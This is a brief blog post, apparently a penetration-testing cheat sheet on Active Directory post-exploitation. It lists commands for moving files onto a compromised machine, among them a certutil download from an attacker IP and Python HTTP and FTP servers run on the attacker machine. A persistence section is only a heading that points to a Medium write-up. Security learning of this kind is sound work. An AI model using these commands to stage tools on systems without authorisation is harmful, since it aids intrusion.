top of page
Search

Post Exploitation: Active Directory

  • Writer: Strider Gearhead
    Strider Gearhead
  • Jul 20, 2023
  • 1 min read


ree

File Transfer

Certutil
  • certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt

HTTP
  • python -m SimpleHTTPServer 80

Browser
  • Navigate directly to file

FTP
  • python -m pyftpdlib 21 (attacker machine)

  • ftp 10.10.10.10 (Attacker IP)

Linux
  • wget

Maintaining Access

Persistence Scripts

To read the Full Write-up please go to my Medium:



 
 
 

Comments


bottom of page